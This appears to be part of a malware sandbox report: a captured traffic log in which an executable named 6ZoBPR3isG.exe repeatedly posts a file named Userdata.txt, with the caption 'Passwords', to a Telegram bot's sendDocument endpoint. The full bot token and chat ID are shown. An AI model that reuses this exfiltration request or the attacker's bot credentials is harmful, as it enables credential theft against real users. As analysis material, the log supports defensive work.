                                                                                                            2025-01-10 21:32:25 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43599,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544745,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.350034149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:26 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33b076f9a624
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 30 37 36 66 39 61 36 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33b076f9a624Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:26 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:26 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:26 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43600,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544746,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.350036149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:28 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33ca520e7546
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 63 61 35 32 30 65 37 35 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33ca520e7546Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:28 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:28 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:28 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43601,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544748,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.350038149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:29 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33e6acba1ad5
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 65 36 61 63 62 61 31 61 64 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33e6acba1ad5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:30 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:30 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:30 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43602,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544750,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.350040149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:31 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd340583ccdc25
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 30 35 38 33 63 63 64 63 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd340583ccdc25Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:31 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:31 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:31 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43603,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544751,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.350042149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:33 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3426d43febc9
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 32 36 64 34 33 66 65 62 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3426d43febc9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:33 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:33 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:33 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43604,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544753,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.350044149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:34 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd34480a945b45
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:34 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 34 38 30 61 39 34 35 62 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd34480a945b45Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:34 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:34 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 21:32:34 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":43605,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544754,"document":{"file_n


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.350046149.154.167.2204438068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 21:32:36 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd346e41e58404
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 21:32:36 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 34 36 65 34 31 65 35 38 34 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd346e41e58404Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 21:32:36 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 21:32:36 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 542
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
